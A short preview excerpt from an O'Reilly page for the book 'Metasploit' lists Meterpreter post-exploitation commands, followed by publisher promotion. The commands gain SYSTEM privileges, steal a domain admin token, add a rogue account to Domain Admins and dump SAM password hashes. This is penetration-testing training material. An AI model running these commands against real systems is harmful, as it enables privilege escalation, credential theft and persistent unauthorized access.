Meterpreter Post Exploitation Commands

Elevate your permissions on Windows-based systems using Meterpreter:

meterpreter > use priv
meterpreter > getsystem

Steal a domain administrator token from a given process ID, add a domain account, and then add it to the Domain Admins group:

meterpreter > ps

meterpreter > steal_token 1784
meterpreter > shell

C:\Windows\system32>net user metasploit p@55w0rd /ADD /DOMAIN
C:\Windows\system32>net group "Domain Admins" metasploit /ADD /DOMAIN

Dump password hashes from the SAM database:

meterpreter > use priv
meterpreter > getsystem
meterpreter > hashdump

Note

On Win2k8 you may need to migrate to a process that is running as SYSTEM if -getsystem and hashdump throw exceptions.

Automigrate to a separate process:

meterpreter ...

Get Metasploit now with the O’Reilly learning platform.

O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.

Start your free trial

Metasploit by David Kennedy, Jim O'Gorman, Devon Kearns, Mati Aharoni

Meterpreter Post Exploitation Commands

Note

Don’t leave empty-handed

It’s yours, free.

Check it out now on O’Reilly